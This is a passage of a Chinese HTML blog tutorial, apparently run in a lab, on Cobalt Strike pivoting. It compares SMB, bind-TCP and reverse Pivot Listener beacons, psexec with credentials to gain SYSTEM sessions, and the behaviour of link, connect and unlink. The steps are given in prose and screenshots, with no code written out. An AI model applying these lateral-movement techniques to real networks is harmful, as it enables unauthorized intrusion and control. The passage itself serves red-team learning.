style="box-sizing: border-box;">目标机器那边运行完可执行文件在跳板机这边link过去，目标机器就可以上线</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);"><strong style="box-sizing: border-box;">。</strong></span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">新建smb类型的listener</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.8571428571428571" data-s="300,640" style="" data-type="png" data-w="406" src="https://wechat2rss.xlab.app/img-proxy/?k=98b345da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50TmnyA26nuSq9yCkXhU7Kgic2B3k8KSyaz4hUWqnx0LicLPwVJlnTIbLQ%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">带着账号密码psexec到靶机得到system权限的会话</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.3734800231615518" data-s="300,640" style="" data-type="png" data-w="1727" src="https://wechat2rss.xlab.app/img-proxy/?k=414ab07b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50ZfHjnribKA2XjzbfZsk6h2kUBS8nflnQEZOgfSffYzUu4luufSPN1Aw%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">以用户权限在靶机上运行smbbeacon.exe，然后link过去，得到用户权限的会话</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.28465487735310896" data-s="300,640" style="" data-type="png" data-w="1753" src="https://wechat2rss.xlab.app/img-proxy/?k=90b5c716&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50hiaLasLGr0QATh8sshFuoISycsnxewgib4HSJgFbWz709VvoQagWWKJw%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">虽然cs这边看上去不是实时通信，但是两台机器其实是连接的状态</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.9858490566037735" data-s="300,640" style="" data-type="png" data-w="636" src="https://wechat2rss.xlab.app/img-proxy/?k=09eb555e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal502jzlS5wThWkEWU8NUydHzgDb6dmOBgxzKE1dBX6PTcYIxA3kCMtM2Q%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">unlink会直接把目标IP刚刚通过smb上线的两个会话全部断开，不过link这个IP两次仍然可以把两个会话都link回来。通过可执行文件上线的会话，</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">unlink之后smbbeacon.exe的进程并没有退出</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">，link一次会重新连接上线。通过psexec上线的system权限会话也可以通过同样的命令link回来。<br/></span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.3030674846625767" data-s="300,640" style="" data-type="png" data-w="815" src="https://wechat2rss.xlab.app/img-proxy/?k=8f53874d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50SlhOYK1j54bcB0wNkXjETZ4wKOUB2m8ibRSdtcMLqfN31fA3XcpYlEw%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="font-size: 15px;color: rgb(62, 60, 60);"><span data-src="C:%5CUsers%5CAdministrator%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5C1562906684215.png" class="md-image md-img-loaded" style="color: rgb(62, 60, 60);font-size: 15px;box-sizing: border-box;min-width: 10px;min-height: 10px;word-break: break-all;font-family: monospace;vertical-align: top;"></span><span class="md-plain" style="color: rgb(62, 60, 60);font-size: 15px;box-sizing: border-box;">下图可见，unlink退掉了所有会话。</span></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">link一次，通过exe上线的普通用户权限会话成功重连上线。同时根据</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">external栏IP地址后面的符号形状</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">也可以判断当前与目标机器的在线状态。</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.4283256880733945" data-s="300,640" style="" data-type="png" data-w="1744" src="https://wechat2rss.xlab.app/img-proxy/?k=ffab1d26&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50Ss6ewH3K8c1tYv1ia8Q7bia40b7meQtARzolrYwLPe0oU1PNeKHNrKew%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">此时的状况从pivot Graph界面来看如下</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.3324200913242009" data-s="300,640" style="" data-type="png" data-w="1095" src="https://wechat2rss.xlab.app/img-proxy/?k=fa7e8aa6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50ggFLK6X4NGFicuibmXYBOPHXic1COibeDVSN9SZH8bRDiauPGnRyBhKU7uQ%2F640%3Fwx_fmt%3Dpng"/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">bind</span><br/></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">在3.13版本当中新增了两个listener相关的功能，其一就是bind形式的</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">TCP Beacon</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">，另外一个reverse形式的</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">Pivot Listeners</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">，这里说说bind先，reverse放在后面说。和smb不同的是，bind这里使用的是&#34;TCP套接字通过父信标进行通信&#34;，Attacks -&gt; Packages -&gt; Windows Executable (S)这里同样可以生成对应的beacon payload。命令格式同smb相似，不过此处连接目标IP的命令不是link，而是connect。</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">取消连接目标机器的话对应的命令与smb同为unlink</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">。</span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">新建bind_tcp类型的会话</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.8475" data-s="300,640" style="" data-type="png" data-w="400" src="https://wechat2rss.xlab.app/img-proxy/?k=bede1a1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50FlspMdnia8wlEZNZIoqICTApSlibYMxEekePfHDRdG4Rr5max6BEDaiag%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">选择bind类型监听器psexec到靶机得到system权限的会话</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.521865889212828" data-s="300,640" style="" data-type="png" data-w="1715" src="https://wechat2rss.xlab.app/img-proxy/?k=889e48de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal509a0SIYQoTfSU0vloXPwqc0icaZDuCbNAqIrnX3BqhTicEXq0LgBZcbyA%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">以用户权限在靶机上运行bind_tcp_beacon.exe，然后connect过去，得到用户权限的会话</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.26066627703097606" data-s="300,640" style="" data-type="png" data-w="1711" src="https://wechat2rss.xlab.app/img-proxy/?k=e6f53e63&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50KxWicYiaA0KIbyLutZ4oe8Go2SWt4G6Kutd93jt7Bl4GdSnlCZPYTR1Q%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">这里有一点需要注意一下，</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">创建bind_tcp类型listener的时候填写的IP和端口信息大概是扯淡的，目标机器打开4444端口是写死的</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">，有需求的话可以自行去源码里面修改一下</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="1.0031397174254317" data-s="300,640" style="" data-type="png" data-w="637" src="https://wechat2rss.xlab.app/img-proxy/?k=ae7496c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50sZwZGsMO0XiauF9LPT5GSY5UAIVSyUK38MOTIb4ia9pmSyTaEWSO3Myg%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">如下图所示，加上之前上线的smb类型会话，使用unlink命令退掉了全部的3个会话。link命令成功重连回来一个smb类型会话，connect命令成功把psexec上线的system权限bind类型会话重连回来，但是connect第二次却无法重连通过bind_tcp_beacon.exe上线的普通用户权限会话。</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">区别就在这里，在我们unlink的时候，smbbeacon.exe只是断开了会话连接但是该进程还在，但是bind_tcp_beacon.exe随着连接的断开进程也会退掉。</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);"><strong style="box-sizing: border-box;"></strong></span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.6967930029154519" data-s="300,640" style="" data-type="png" data-w="1372" src="https://wechat2rss.xlab.app/img-proxy/?k=ad81d80d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50zu7QadpYNf4ejp1IW9ibHm9E1cvDlZydNCw7ltqHnETa6RviaiaDIzAzA%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">在四个会话全部在线的情况下对smb、bind两种上线方式做一个简单的对比，根据进程占用和连接情况基本可以发现问题所在。</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.08635703918722787" data-s="300,640" style="" data-type="png" data-w="1378" src="https://wechat2rss.xlab.app/img-proxy/?k=020df520&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal5046G3kMzXrtq001o5ANg7g2lc78vzbpl1PgjqgeZATia1icHPu8JFlbnw%2F640%3Fwx_fmt%3Dpng"/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">reverse</span><br/></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">重点来了，吊人胃口的Pivot Listeners有些不见首不见尾。首先添加</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">windows/beacon_reverse_tcp</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">类型的listener不是在Cobalt Strike -&gt; Listeners当中（不过删除是在这），而是右键单击被控机器在</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"> <strong style="box-sizing: border-box;">[beacon]</strong> -&gt; <strong style="box-sizing: border-box;">Pivoting</strong> -&gt; <strong style="box-sizing: border-box;">Listener</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">这里添加（该类型listener的添加似乎是无限制的，就是说按照程序的设定来看控了多少机器就可以添加多少，可以串一株幸运草串一个同心圆）。另外相当nice的一点是Linux跳板机上也支持这种操作，嫌麻烦此处留一个小遗憾不再测Linux环境。</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.4355083459787557" data-s="300,640" style="" data-type="png" data-w="659" src="https://wechat2rss.xlab.app/img-proxy/?k=41c1a220&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50MWWmPWEwibo5taBvhicryfG3Y46q2libWXlx16PUDrvzCQZMSd4pvdF5w%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.10817610062893082" data-s="300,640" style="" data-type="png" data-w="1590" src="https://wechat2rss.xlab.app/img-proxy/?k=ed085521&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50urPicmLnpJrof4pwvoXmOYeQIO7q2yw6NP7BE7fpTc2eQJTpsTtDjibw%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">然而命令行可见其实其本质是这样的</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.13272727272727272" data-s="300,640" style="" data-type="png" data-w="550" src="https://wechat2rss.xlab.app/img-proxy/?k=d93d1e57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50QogWBq6iaTiaUCxVBm3fMJcGWSMYzZBu5mNXL91OnsmU8tN1AYBqj17w%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">此时去psexec目标机器发现listener列表里并没有刚刚添加的reverse</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.6896551724137931" data-s="300,640" style="" data-type="png" data-w="580" src="https://wechat2rss.xlab.app/img-proxy/?k=2c53c5ac&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50pmt2lBU9MH66e6FLibdu4zwCiaQ3SXtEM9lpTzN2xDAnZLEW9GsyZduw%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">回手点到</span><span style="box-sizing: border-box;font-size: 15px;color: rgb(0, 0, 0);"><strong style="box-sizing: border-box;">Attacks</strong> -&gt; <strong style="box-sizing: border-box;">Packages</strong> -&gt; <strong style="box-sizing: border-box;">Windows Executable (S)</strong></span><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">，发现reverse他在灯火阑珊处</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.8130081300813008" data-s="300,640" style="" data-type="png" data-w="369" src="https://wechat2rss.xlab.app/img-proxy/?k=6cb29f2b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50O40andzjsozjLIk4iakibOwGqmO6KZTXdZficSerxfu7DrGSHNOlSFgeA%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">生成exe运行上线，注意图中箭头方向</span></p><p style="text-align: center;"><img class="rich_pages" data-copyright="0" data-ratio="0.6223539373412362" data-s="300,640" style="" data-type="png" data-w="1181" src="https://wechat2rss.xlab.app/img-proxy/?k=fc9f279b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0LlBBXljp5Bv9Mv7Otal50W9Zdg69qb2SibMrH2Q3dMUjov2GH8wWPiaKcibldia8cKwC5s0heWyCEvA%2F640%3Fwx_fmt%3Dpng"/></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">额外需要注意的一点是，reverse类型的Pivot Listeners同样受unlink命令影响，且同bind_tcp一样，unlink之后进程会直接退出，没有持久化操作的话不去重新运行exe是无法重连上线的，这也应该算是普通beacons的特性之一。</span><span class="md-plain" style="box-sizing: border-box;"></span><br/></p><h3 class="md-end-block md-heading" style="box-sizing: border-box;font-size: 1.5em;margin-top: 1rem;margin-bottom: 1rem;font-weight: bold;line-height: 1.43;cursor: text;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span class="md-plain" style="box-sizing: border-box;">rportfwd</span></h3><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear Sans&#34;,&#34;Helvetica Neue&#34;,Helvetica,Arial,sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration-style: initial;text-decoration-color: initial;"><span style="box-sizing: border-box;font-size: 15px;color: rgb(62, 60, 60);">很多工具都可以实现端口转发的功能，端口转发功能在这种相似的环境下可以做的事情也不止上线这一种，这里只是做一个思路记录，所以简单介绍一笔带过。</span></p><p class="md-end-block md-p" style="box-sizing: border-box;margin: 0.8em 0px;white-space: pre-wrap;color: rgb(51, 51, 51);font-family: &#34;Open Sans&#34;,&#34;Clear 